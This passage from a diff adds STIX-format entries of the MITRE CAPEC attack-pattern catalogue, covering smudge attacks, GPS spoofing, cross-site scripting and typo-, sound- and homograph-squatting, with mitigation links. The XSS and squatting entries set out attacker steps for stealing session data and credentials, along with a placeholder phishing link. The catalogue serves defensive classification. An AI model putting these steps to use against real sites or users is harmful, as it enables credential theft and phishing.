}, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11480983-629b-48d4-bb0d-9b7bede4d597", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b219b8f8-c28d-470b-8031-48f247b21a37", + "target_ref": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user’s fingers.", + "external_references": [ + { + "external_id": "CAPEC-626", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/626.html" + } + ], + "id": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Smudge Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "The attacker must have physical access to the device." + ], + "x_capec_skills_required": { + "Medium": "The attacker must know how to make use of these smudges." 
+ }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of the device.", + "id": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-626-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f1608da-3175-4247-965b-9dee8d21b05f", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "target_ref": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. 
These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-627", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/627.html" + } + ], + "id": "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Counterfeit GPS Signals", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--3b7a108f-f42f-42c7-99be-a16ec15ca0ff" + ], + "x_capec_prerequisites": [ + "The target must be relying on valid GPS signal to perform critical operations." + ], + "x_capec_resources_required": [ + "Ability to create spoofed GPS signals." + ], + "x_capec_skills_required": { + "High": "The ability to spoof GPS signals is not trival." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A common form of a GPS spoofing attack, commonly termed a carry-off attack begins with an adversary broadcasting signals synchronized with the genuine signals observed by the target receiver. The power of the counterfeit signals is then gradually increased and drawn away from the genuine signals. 
Over time, the adversary can carry the target away from their intended destination and toward a location chosen by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-628", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/628.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-489", + "source_name": "reference_from_CAPEC", + "url": "https://en.wikipedia.org/wiki/Spoofing_attack#GPS_Spoofing" + } + ], + "id": "attack-pattern--3b7a108f-f42f-42c7-99be-a16ec15ca0ff", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Carry-Off GPS Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74" + ], + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "A \"proof-of-concept\" attack was successfully performed in June, 2013, when the luxury yacht \"White Rose\" was misdirected with spoofed GPS signals from Monaco to the island of Rhodes by a group of aerospace engineering students from the Cockrell School of Engineering at the University of Texas in Austin. The students were aboard the yacht, allowing their spoofing equipment to gradually overpower the signal strengths of the actual GPS constellation satellites, altering the course of the yacht." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must be relying on valid GPS signal to perform critical operations." + ], + "x_capec_skills_required": { + "High": "This attack requires advanced knoweldge in GPS technology." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-629", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/629.html" + } + ], + "id": "attack-pattern--61baa525-b9a3-4474-98d9-7645906e4cc3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Unauthorized Use of Device Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. 
Further, these attacks are very difficult for an end user to detect.", + "external_references": [ + { + "external_id": "CAPEC-63", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/63.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "Cross-Site Scripting", + "external_id": "08", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Scripting" + }, + { + "description": "Cross Site Scripting (XSS)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/xss" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cross-Site Scripting (XSS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--8bd0c718-f126-4397-9754-c5225da7b696", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary 
Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this:\n maliciousscript\">Trusted Site\n When the user clicks the link, the appended script also executes on the local user's machine.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for XSS vulnerability: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of XSS probe strings to inject script into UI entry fields. If possible, the probe strings contain a unique identifier.
    Use a list of XSS probe strings to inject script into resources accessed by the application. If possible, the probe strings contain a unique identifier.

Exploit

  1. Steal session IDs, credentials, page content, etc.: As the attacker succeeds in exploiting the vulnerability, they can choose to steal user's credentials in order to reuse or to analyze them later on.

  2. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
    Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.
  3. Forceful browsing: When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).

  4. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
    Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).
  5. Content spoofing: By manipulating the content, the attacker targets the information that the user would like to get from the website.

  6. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_prerequisites": [ + "Target client software must be a client that allows scripting communication from remote hosts, such as a JavaScript-enabled Web Browser." + ], + "x_capec_resources_required": [ + "Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply place a script in bulletin board, blog, wiki, or other user-generated content site that are echoed back to other client machines." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b2e5df5-9856-4289-90c4-ecaa908f4206", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9acc276d-8c69-42b8-af78-29193fa00cba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f74ac5d-bb0a-4f7e-9601-cfc8bac01201", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dabf76e9-8f71-45cd-a775-c1d8040bd5a8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--950d64aa-75ae-40ab-993f-9a539cc6ce36", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--e7f5d816-04cc-4ad5-823a-b420121bb86e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6e23539-a2eb-4b8f-a47e-aac60fb3f876", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6b510bd-d7a8-4d02-aef8-cdfb98c31f65", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name with at least one character different than a trusted domain. A TypoSquatting attack takes advantage of instances where a user mistypes a URL (e.g. www.goggle.com) or not does visually verify a URL before clicking on it (e.g. phishing attack). 
As a result, the user is directed to an adversary-controlled destination. TypoSquatting does not require an attack against the trusted domain or complicated reverse engineering.", + "external_references": [ + { + "external_id": "CAPEC-630", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/630.html" + }, + { + "description": "Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens, Wouter Joosen, Soundsquatting: Uncovering the Use of Homophones in Domain Squatting, Trend Micro", + "external_id": "REF-491", + "source_name": "reference_from_CAPEC", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf" + } + ], + "id": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TypoSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful TypoSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating paypal.com, to a user stating that they have just received a money transfer and to click the given link to obtain their money.\n However, the link the in email is paypa1.com instead of paypal.com, which the user clicks without fully reading the link.\n The user is directed 
to the adversary's website, which appears as if it is the legitimate paypal.com login page.\n The user thinks they are logging into their account, but have actually just given their paypal credentials to the adversary. The adversary can now use the user's legitimate paypal credentials to log into the user's account and steal any money which may be in the account.\n TypoSquatting vulnerability allows an adversary to impersonate a trusted domain and trick a user into visiting the malicious website to steal user credentials.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

  2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the TypoSquatted URL.

  2. Techniques
    Register the TypoSquatted domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the TypoSquatted domain.

  2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the TypoSquatted domain.
    Assume that a user will incorrectly type the legitimate URL, leading the user to the TypoSquatted domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase potential TypoSquatted domains and forward to legitimate domain.", + "id": "course-of-action--57146b6f-bca0-47d6-9268-5475bdf66db1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-630-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2442a11-1be7-42c6-b9e8-d6e757681156", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--57146b6f-bca0-47d6-9268-5475bdf66db1", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" 
+ }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name that sounds the same as a trusted domain, but has a different spelling. A SoundSquatting attack takes advantage of a user's confusion of the two words to direct Internet traffic to adversary-controlled destinations. SoundSquatting does not require an attack against the trusted domain or complicated reverse engineering.", + "external_references": [ + { + "external_id": "CAPEC-631", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/631.html" + }, + { + "description": "Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens, Wouter Joosen, Soundsquatting: Uncovering the Use of Homophones in Domain Squatting, Trend Micro", + "external_id": "REF-491", + "source_name": "reference_from_CAPEC", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf" + } + ], + "id": "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "SoundSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Homophone Attack" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful SoundSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + 
"Social Engineering" + ], + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating the popular banking website guaranteebanking.com, to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is guarantybanking.com instead of guaranteebanking.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's website, which appears as if it is the legitimate guaranteebanking.com login page.\n The user thinks they are logging into their account, but have actually just given their guaranteebanking.com credentials to the adversary. The adversary can now use the user's legitimate guaranteebanking.com credentials to log into the user's account and steal any money which may be in the account.See also: SoundSquatting vulnerability allows an adversary to impersonate a trusted domain and leverages a user's confusion between the meaning of two words which are pronounced the same into visiting the malicious website to steal user credentials." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted, receives a consistent amount of traffic, and is a homophone.

  2. Techniques
    Research popular or high traffic websites which are also homophones.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the SoundSquatted URL.

  2. Techniques
    Register the SoundSquatted domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the SoundSquatted domain.

  2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the SoundSquatted domain.
    Assume that a user will unintentionally use the homophone in the URL, leading the user to the SoundSquatted domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73bbe3cf-9d46-458f-b272-44e8c8bdbfdd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "target_ref": "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase potential SoundSquatted domains and forward to legitimate domain.", + "id": "course-of-action--4e3cac99-a7ec-420d-935d-3db74d0bb10a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-631-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a91eb59a-9010-4d4f-baca-16b413704ed6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e3cac99-a7ec-420d-935d-3db74d0bb10a", + "target_ref": "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "type": "relationship", + "x_capec_version": "3.9" 
+ }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name containing a homoglyph, leading the registered domain to appear the same as a trusted domain. A homograph attack leverages the fact that different characters among various character sets look the same to the user. Homograph attacks must generally be combined with other attacks, such as phishing attacks, in order to direct Internet traffic to the adversary-controlled destinations.", + "external_references": [ + { + "external_id": "CAPEC-632", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/632.html" + }, + { + "external_id": "CWE-1007", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1007.html" + } + ], + "id": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Homograph Attack via Homoglyphs", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Homoglyph Attack" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful Homograph attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + 